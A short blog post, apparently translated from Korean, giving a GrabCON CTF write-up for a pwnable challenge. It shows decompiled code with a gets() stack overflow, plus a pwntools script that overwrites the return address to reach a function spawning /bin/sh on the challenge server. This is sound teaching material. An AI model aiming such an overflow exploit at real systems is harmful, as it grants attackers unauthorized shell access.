2021-09-09 · 1

GrabCON CTF — Easy Bin write-up

securityctf

この記事は公開から2年以上経過しています。

GrabCON CTF


今回の GrabCON に参加して、pwnable だけ少し解いて抜けました。全 4 問ありましたが 3 問しか解けなくてとても悲しいです ㅠ。

CODE

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[48]; // [rsp+0h] [rbp-30h] BYREF

  gets(v4, argv, envp);
  printf("well lets check if you can bypass me!!!");
  return 0;
}
__int64 vuln()
{
  execve("/bin/sh", 0LL, 0LL);
  return 0LL;
}

あまりにも簡単な BOF 問題のようです。ファイルは 64BIT で、ペイロードは dummy[48] + sfp[8] + vuln になりそうです。

ソースコード

もっと見る

from pwn import *

p = remote('35.205.161.145', 49153)

vuln = p64(0x401146)

payload = b''
payload += b'A'*56 + vuln

p.sendline(payload)
p.interactive()

[ハッキング/システムハッキング] - [システムハッキング] Buffer Overflow (BOF)

[[システムハッキング] Buffer Overflow (BOF)

BUFFER OVERFLOW BOF 設定されているバッファのサイズより大きく入力を受け取れるときに生じる脆弱性です。int __cdecl main(int argc, const char **argv, const char **envp) { char s[40]; // [esp+4h] > ebp-34h..

— nabomhalang.tistory.com


原文(韓国語): tistory — 2021-09-09 公開、当ブログへ移行。この翻訳は AI の協力で作成されました。

コメント

コメントを削除しますか?

関連記事

GrabCON CTF — Easy Bin write-up · 나봄하랑